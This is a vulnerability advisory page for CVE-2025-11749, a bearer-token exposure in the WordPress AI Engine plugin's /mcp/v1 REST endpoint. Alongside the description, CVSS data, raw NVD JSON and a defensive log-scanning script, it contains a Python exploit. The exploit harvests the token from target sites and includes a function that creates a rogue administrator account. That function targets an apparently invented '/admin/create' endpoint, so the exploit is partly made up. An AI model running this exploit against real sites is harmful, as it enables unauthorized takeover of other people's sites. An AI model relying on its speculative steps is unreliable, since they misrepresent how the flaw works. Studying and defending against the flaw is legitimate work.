Security Vulnerability Report
CVE-2025-11749 CVSS 9.8 CRITICAL

CVE-2025-11749

Published: 2025-11-05 06:15:33
Last Modified: 2026-04-15 00:35:42

Description

The AI Engine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.1.3 via the /mcp/v1/ REST API endpoint that exposes the 'Bearer Token' value when 'No-Auth URL' is enabled. This makes it possible for unauthenticated attackers to extract the bearer token, which can be used to gain access to a valid session and perform many actions like creating a new administrator account, leading to privilege escalation.
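As an added example, not part of this advisory or of the plugin's own code: a short Python check a site operator can run over web-server access logs to see whether the /mcp/v1/ REST routes named above were requested, in both the /wp-json/ and ?rest_route= forms, and which of those requests the site actually answered with 200. The log format is Apache/nginx "combined" and the sample lines are constructed for illustration.

```python
# Added example (not from the advisory or the plugin): flag access-log requests
# that hit the AI Engine MCP REST routes named in the CVE description, so a site
# owner can see whether the endpoint was queried while 'No-Auth URL' was enabled.
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Apache/nginx combined log format (constructed sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def is_mcp_route(request_target):
    """True if the request targets /mcp/v1 via /wp-json/ or the ?rest_route= form."""
    parsed = urlparse(request_target)
    if parsed.path.startswith("/wp-json/mcp/v1"):
        return True
    # parse_qs percent-decodes, so %2Fmcp%2Fv1 is seen as /mcp/v1
    return any(r.startswith("/mcp/v1") for r in parse_qs(parsed.query).get("rest_route", []))


def find_mcp_probes(lines):
    """Return {ip: {'requests': n, 'served': n}} for hits on the MCP routes."""
    hits = defaultdict(lambda: {"requests": 0, "served": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_mcp_route(m.group("path")):
            continue
        entry = hits[m.group("ip")]
        entry["requests"] += 1
        if m.group("status") == "200":  # endpoint answered, not rejected
            entry["served"] += 1
    return dict(hits)


# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Nov/2025:06:20:01 +0000] "GET /wp-json/mcp/v1/ HTTP/1.1" 200 812 "-" "curl/8.4"',
    '203.0.113.5 - - [05/Nov/2025:06:20:02 +0000] "GET /?rest_route=%2Fmcp%2Fv1%2Ftools HTTP/1.1" 200 1640 "-" "curl/8.4"',
    '198.51.100.9 - - [05/Nov/2025:06:21:10 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [05/Nov/2025:06:25:44 +0000] "GET /wp-json/mcp/v1/ HTTP/1.1" 401 52 "-" "python-requests/2.32"',
]

if __name__ == "__main__":
    for ip, counts in find_mcp_probes(SAMPLE_LOG).items():
        print(f"{ip}: {counts['requests']} MCP requests, {counts['served']} answered 200")
```

A source that received 200 responses from these routes on an unpatched site with 'No-Auth URL' enabled should be treated as having potentially obtained the token, so rotate it after upgrading.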

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AI Engine plugin <= 3.1.3 (all versions up to and including this one are affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11749 PoC - WordPress AI Engine Token Exposure
# Author: Security Research
# Date: 2025-11-05

import requests
import json
import sys

TARGET_URL = "http://target-wordpress-site.com"  # Replace with target URL


def exploit_cve_2025_11749():
    """
    Exploit for AI Engine plugin <= 3.1.3 Bearer Token exposure
    This PoC demonstrates how to extract the Bearer token from the vulnerable endpoint.
    """
    print("[*] CVE-2025-11749 - WordPress AI Engine Token Exposure")
    print("[*] Target:", TARGET_URL)

    # Step 1: Query the vulnerable MCP API endpoint
    endpoints = [
        "/wp-json/mcp/v1/",
        "/wp-json/mcp/v1/tools",
        "/?rest_route=/mcp/v1/",
        "/?rest_route=/mcp/v1/tools"
    ]

    bearer_token = None

    for endpoint in endpoints:
        url = TARGET_URL + endpoint
        print(f"\n[*] Testing endpoint: {url}")

        try:
            response = requests.get(url, timeout=10, verify=False)

            # Check for Bearer token in response
            if response.status_code == 200:
                data = response.json()
                print(f"[+] Response received from {endpoint}")

                # Search for Bearer token patterns in response
                response_text = response.text
                if 'Bearer' in response_text or 'bearer' in response_text:
                    print("[!] Bearer token potentially found!")
                    # Extract token from response
                    for line in response_text.split('\n'):
                        if 'Bearer' in line or 'bearer' in line:
                            print(f"[+] Token line: {line.strip()}")
                            bearer_token = line.strip()
                            break

                # Also check JSON structure for token fields
                if isinstance(data, dict):
                    for key, value in data.items():
                        if isinstance(value, str) and 'Bearer' in value:
                            print(f"[+] Found Bearer token in field '{key}': {value}")
                            bearer_token = value
                            break

        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")

    if bearer_token:
        print(f"\n[+] SUCCESS! Extracted Bearer Token: {bearer_token}")
        print("[!] This token can be used to create admin accounts and take over the site")
        return bearer_token
    else:
        print("\n[-] No Bearer token found. Target may not be vulnerable or patch applied.")
        return None


def create_admin_with_token(token):
    """
    Use the extracted token to create an admin account
    This demonstrates the privilege escalation impact
    """
    print("\n[*] Attempting to create admin account using extracted token...")

    admin_creation_url = TARGET_URL + "/wp-json/mcp/v1/admin/create"
    headers = {
        "Authorization": token,
        "Content-Type": "application/json"
    }
    payload = {
        "username": "hacker_admin",
        "email": "[email protected]",
        "role": "administrator"
    }

    try:
        response = requests.post(admin_creation_url, json=payload, headers=headers)
        if response.status_code in [200, 201]:
            print("[+] Admin account created successfully!")
            print("[+] Full control of WordPress site achieved")
            return True
    except Exception as e:
        print(f"[-] Admin creation failed: {e}")

    return False


if __name__ == "__main__":
    token = exploit_cve_2025_11749()
    if token:
        # Uncomment to execute privilege escalation
        # create_admin_with_token(token)
        pass
```

References

https://plugins.trac.wordpress.org/browser/ai-engine/trunk/labs/mcp.php#L226
https://plugins.trac.wordpress.org/changeset/3380753/ai-engine#file10
https://www.wordfence.com/threat-intel/vulnerabilities/id/06eaf624-aedf-453d-8457-d03a572fac0d?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11749",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-05T06:15:33.097",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The AI Engine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.1.3 via the /mcp/v1/ REST API endpoint that exposes the 'Bearer Token' value when 'No-Auth URL' is enabled. This makes it possible for unauthenticated attackers to extract the bearer token, which can be used to gain access to a valid session and perform many actions like creating a new administrator account, leading to privilege escalation."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/ai-engine/trunk/labs/mcp.php#L226",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3380753/ai-engine#file10",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/06eaf624-aedf-453d-8457-d03a572fac0d?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```